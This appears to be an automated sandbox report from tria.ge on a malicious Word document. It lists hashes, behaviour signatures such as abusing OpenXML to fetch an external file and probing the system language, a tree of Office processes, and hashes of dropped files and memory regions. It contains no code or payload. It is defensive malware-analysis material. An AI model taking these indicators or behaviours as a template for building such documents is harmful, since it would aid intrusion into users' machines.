Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    15/08/2024, 18:38

General

  • Target

    9b2c4bb79d5f2601d627f4157d0f58ff_JaffaCakes118.doc

  • Size

    235KB

  • MD5

    9b2c4bb79d5f2601d627f4157d0f58ff

  • SHA1

    f52b8b57b92c899973b4b3ee1c88ce792b55e587

  • SHA256

    503dc4cb42caf34593bb5c25ed0b6eb44a6487f98be0866e14db37f8df050cee

  • SHA512

    535d9b2c78654bc52b7c79e169c3ca4c96a3e689f0b9fbca3f5a3e920709746d2596db61707b1ed1f758a662be8161687b353d943efcafce5d0285d9627158db

  • SSDEEP

    3072:LUwxv5OsmqrmrAKHIedS9DKJlzoQzVT2i:LUgv5O4rmECU92vzoQhyi

Score
7/10

Malware Config

Signatures

  • Abuses OpenXML format to download file from external location 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9b2c4bb79d5f2601d627f4157d0f58ff_JaffaCakes118.doc"
    1⤵
    • Abuses OpenXML format to download file from external location
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2748
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2588
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      1⤵
      • Abuses OpenXML format to download file from external location
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:1108
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:2504
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      1⤵
      • Abuses OpenXML format to download file from external location
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:1988
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      1⤵
      • Abuses OpenXML format to download file from external location
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:1272
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      1⤵
      • Abuses OpenXML format to download file from external location
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      PID:1532

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      171a68a53ee98d54753cf8ee7eab1c70

      SHA1

      ee06d55fe498150aa01255e23357f8c972be2b12

      SHA256

      a55113c1bfbfef9b9990eaeb71263a9473c63498df9c2883933c25e88a5a22eb

      SHA512

      7a289616a00248d2ae8af93ae996327f9e901397e31d0c3fd0595ef7fd1d017444c669674ca47a22cb1406d35332706e0e040ad4d79a2026bc2fa43d84d85125

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{923F8D1B-D2CD-495F-A976-A95EC24AFBED}.FSD

      Filesize

      128KB

      MD5

      21cfa2cbb0d7013ad0a590c93eb1c6ba

      SHA1

      c0f9423a621180d8c4a6b794f5d4ee28d3f2883b

      SHA256

      8ffd7949d6c7a9fb3f69cbfcff244be39950215b91183181c2bdb458b6e6ab44

      SHA512

      7058e22e586c4f217f4e40049e17c3099f831fb61b55657138738e8339e759913a7a381e9af0781ddc328809d69cd9b5686cc562cbdb5f8dfac3579a24b16e9f

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{923F8D1B-D2CD-495F-A976-A95EC24AFBED}.FSD

      Filesize

      128KB

      MD5

      342edc4a78eebe1f414a800d7d22aa66

      SHA1

      9d8b9ee3fa339daf24fa79584102f897c403b948

      SHA256

      f65014a28e9dbf632cb668e7d892d1bb6867650f981babb565fb02277f4700ae

      SHA512

      73acd6d811c3aa1797fa41464960effac4abca1b1e623752e5a692ad9421083a5ad1f8ac1337ebc1bd9181a2e1c351031e8ce89b0128052bd693f11ff8b94616

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

      Filesize

      114B

      MD5

      9f0a0dc8ec5233bc152fbb254a6c15fd

      SHA1

      c62514fa378a4710969a81e2b0e8a5481549aeb4

      SHA256

      ef2867e02bbcce90594f5707f7fc65eb35764f2f2deb26cbeb6078182f1e85fd

      SHA512

      1bca94ceca2ba4041d4ebcdd25320f5713e29dd00709dbd6d51dfe7897b0160465842fdde2a8210a5af5494b55af9c8c1ba7eff96e6622f64acb44ab6f911d8d

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      7bfb2ea79bbb0e4a2652a6ca1686fc38

      SHA1

      ea86543cb836e1ee140c739657ca26bd6c8f350d

      SHA256

      41069815ddc2f16a4dce6d794528699a02cd781bd0afaab72c5deaba9f93fb5a

      SHA512

      249130a9a141182b06531f66446c961e5af1b2c31e3afd90ea69668809f4dd7454b1d55089360dea1bd6f8435a4a984da4059eb8046036ad31d5b43427d65e00

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      93fc4096fc7d532811667196a7fd882e

      SHA1

      a86ffe20254f8594042c1348d82118258589f6aa

      SHA256

      85f3a46eb28f588c3c7b13710b0c85202c5439c52dccb91b1c82318ab0832481

      SHA512

      e9858007b69a9c93d2af83ee4f707ce54ffd7df9d49aa152b00a9a497635bbbf7f866e8c798522047d4deeddad72aecb9bb683c8512609e9fa75be2f9446a52c

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{8047D201-C4CE-47B6-BB9B-2A851C283873}.FSD

      Filesize

      128KB

      MD5

      86e4474e37c1bdca7d37b53d8af416a8

      SHA1

      16c12a61d7874ad44b319ee3f407978fe54732fa

      SHA256

      56a5fc94b6213903ecb708f61514f38a556f57ee26903215ba869387502a9e97

      SHA512

      2d8ecf88915fc6fe8ec0920ccc1f6de8ecc800aa6971bb36bc8171e2c639732bf38bcfd09e58874755f553c23c6630957b0d837513e0745c4dc652ccea934f5d

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

      Filesize

      114B

      MD5

      bace647b431aec75d85ad5e7425616c6

      SHA1

      e1910da1e4d5c07f4be25a90291c838ea2973e59

      SHA256

      5665dfc70570bd3dd16226ad5987af1891f14c8d7fe9da2b6dae3a17e245c403

      SHA512

      569debe8fcf4138f4b1f45c4b19dc82b8ba8923f06ec536c2845754ec07e6d1f77edf44d16a69f0a35de43827881dacb23b19372694d6e14f0b797396d22ddd9

    • C:\Users\Admin\AppData\Local\Temp\VBE\MSForms.exd

      Filesize

      143KB

      MD5

      d9d315fe1b69ef2235ed23984012c3c1

      SHA1

      1d3a78861f14241b6efd4cd5064d11bf4d2b9586

      SHA256

      330a63321a52d7a1ea048532cdd71dc1f39b4a90466d8a9134548ab4add985a3

      SHA512

      9f3546bb6c925c4a6d6e6c498839912154fdc230a3d03ef852553184de95eb01171af6bdf280164a9e3702500429980cd1a086e7fc49498dfb98ab494059ab2f

    • C:\Users\Admin\AppData\Local\Temp\{BC5F7963-A937-44DA-B22C-E6F6E64ABD4E}

      Filesize

      128KB

      MD5

      250b152a526ef5b9274079a347ca70bc

      SHA1

      69efbb6c0ca9c29309e0aa3185119ced3234c58e

      SHA256

      bd37243e3a68a208dce9e604db60b6e7b05b0f30fc4e2353498b93fa5be8c714

      SHA512

      ef551817feaf479973a1a87a12a5ecdf03b02b12fec3f54a5ad6db912558bfbae8ca32977d539b90475290597475b9e838236d26a5435f2a25841189298706a0

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      068004f27e99371d76894de5511fdeaa

      SHA1

      574ac17490c79156f35feeb63d902785972ee56e

      SHA256

      957b09c221db176239bf9cad848ea21f2e1adcaca0b9dc0d839439c4d35a2f5e

      SHA512

      be98fedb4559e8fff9c20dad657746bc77ee9fba6842cb920db218d048c988b543a9b722fa6e1d83f740bca013521aa6b25cf631fc7e6de4557acce66ab9c9b0

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

      Filesize

      2B

      MD5

      f3b25701fe362ec84616a93a45ce9998

      SHA1

      d62636d8caec13f04e28442a0a6fa1afeb024bbb

      SHA256

      b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

      SHA512

      98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    • memory/1108-1018-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2504-1031-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1435-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1032-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1489-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1030-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1029-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1077-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1195-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1242-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1147-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1291-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1033-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1387-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1339-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1034-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2748-60-0x000000000ED40000-0x000000000EE40000-memory.dmp

      Filesize

      1024KB

    • memory/2748-59-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2748-9-0x00000000716ED000-0x00000000716F8000-memory.dmp

      Filesize

      44KB

    • memory/2748-2-0x00000000716ED000-0x00000000716F8000-memory.dmp

      Filesize

      44KB

    • memory/2748-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2748-0-0x000000002F3A1000-0x000000002F3A2000-memory.dmp

      Filesize

      4KB